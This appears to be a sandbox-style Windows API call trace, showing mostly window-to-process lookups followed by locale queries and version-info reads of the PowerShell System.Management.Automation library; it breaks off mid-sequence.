	[0631.520] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14a8
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1490
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14a4
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x148c
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1458
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b4c
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b3c
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x19bc
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x199c
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1998
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1994
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1990
	[0631.521] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1984
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x197c
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1978
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1824
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1088
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1908
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x18cc
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x18d0
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1840
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10c4
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x128c
	[0631.522] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16e8
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16cc
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x274
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10e0
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10cc
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10c0
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10d0
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1198
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1080
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1074
	[0631.523] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x106c
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1474
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1414
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbd0
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x550
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa38
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16d0
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16d4
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15bc
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15a0
	[0631.524] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x159c
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1598
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1594
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1590
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x158c
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1588
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1584
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1580
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x157c
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1488
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1404
	[0631.525] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11b8
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbd4
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe0c
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd30
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe70
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13b8
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe20
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe2c
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe00
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe04
	[0631.526] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc94
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13b0
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13ac
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13a8
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1374
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x132c
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1328
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12d0
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12cc
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12c8
	[0631.527] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1290
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1218
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1214
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11ec
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11e8
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11cc
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1140
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe6c
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6e8
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc6c
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf94
	[0631.528] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xffc
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf74
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf08
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf0c
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xed8
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe90
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xea8
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfa8
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfbc
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb8
	[0631.529] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb4
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfb0
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfac
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfc0
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfd0
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf88
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf84
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf80
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xde0
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xddc
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdd8
	[0631.530] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd34
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd10
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd0c
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc9c
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc74
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc1c
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc08
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xabc
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x24c
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbb0
	[0631.531] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbfc
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb10
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x374
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x368
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb28
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xae8
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb14
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x95c
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa8c
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x46c
	[0631.532] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb3c
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa90
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xad0
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa9c
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaa0
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb1c
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7e0
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa74
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x694
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa28
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x9b0
	[0631.533] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8d8
	[0631.537] WerSetFlags () returned 0x0
	[0634.215] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0634.215] CoTaskMemFree (pv=0x0) 
	[0634.216] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda80 | out: pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda80) returned 1
	[0634.217] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x2bb46f0, pcchLanguagesBuffer=0x1eda80 | out: pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x2bb46f0, pcchLanguagesBuffer=0x1eda80) returned 1
	[0634.223] CoTaskMemAlloc (cb=0x24) returned 0x3daa50
	[0634.223] GetUserDefaultLocaleName (in: lpLocaleName=0x3daa50, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0634.223] CoTaskMemFree (pv=0x3daa50) 
	[0636.225] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0636.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.225] CoTaskMemFree (pv=0x33a4f0) 
	[0636.228] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0636.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.228] CoTaskMemFree (pv=0x33a4f0) 
	[0636.231] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0636.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.231] CoTaskMemFree (pv=0x33a4f0) 
	[0636.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.245] SetErrorMode (uMode=0x1) returned 0x1
	[0636.245] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed700 | out: lpFileInformation=0x1ed700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0636.246] SetErrorMode (uMode=0x1) returned 0x1
	[0636.246] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ed970 | out: lpdwHandle=0x1ed970) returned 0x94c
	[0636.248] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb7f80 | out: lpData=0x2bb7f80) returned 1
	[0636.249] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2bb801c, puLen=0x1ed8e0) returned 1
	[0636.249] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb80f8, puLen=0x1ed850) returned 1
	[0636.249] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0636.249] CoTaskMemAlloc (cb=0x2e) returned 0x3d6bb0
	[0636.249] lstrcpyW (in: lpString1=0x3d6bb0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0636.250] CoTaskMemFree (pv=0x3d6bb0) 
	[0636.250] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb814c, puLen=0x1ed850) returned 1
	[0636.250] lstrlenW (lpString="System.Management.Automation") returned 28
	[0636.250] CoTaskMemAlloc (cb=0x3c) returned 0x3e2000
	[0636.250] lstrcpyW (in: lpString1=0x3e2000, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0636.250] CoTaskMemFree (pv=0x3e2000) 
	[0636.250] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb81a8, puLen=0x1ed850) returned 1
	[0636.250] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0636.250] CoTaskMemAlloc (cb=0x20) returned 0x3daa20
	[0636.250] lstrcpyW (in: lpString1=0x3daa20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0636.250] CoTaskMemFree (pv=0x3daa20) 
	[0636.250] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb81e8, puLen=0x1ed850) returned 1
	[0636.250] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.250] CoTaskMemAlloc (cb=0x44) returned 0x3e2000
	[0636.250] lstrcpyW (in: lpString1=0x3e2000, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.250] CoTaskMemFree (pv=0x3e2000) 
	[0636.250] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb8250, puLen=0x1ed850) returned 1
	[0636.250] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0636.250] CoTaskMemAlloc (cb=0x76) returned 0x37f9a0
	[0636.251] lstrcpyW (in: lpString1=0x37f9a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0636.251] CoTaskMemFree (pv=0x37f9a0) 
	[0636.251] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb82ec, puLen=0x1ed850) returned 1
	[0636.251] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0636.251] CoTaskMemAlloc (cb=0x44) returned 0x3e2000
	[0636.251] lstrcpyW (in: lpString1=0x3e2000, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0636.251] CoTaskMemFree (pv=0x3e2000) 
	[0636.251] VerQueryValueW (in: pBlock=0x2bb7f80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2bb8350, puLen=0x1ed850) returned 1
	[0636.251] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0636.251] CoTaskMemAlloc (cb=0x58) returned 0x367400
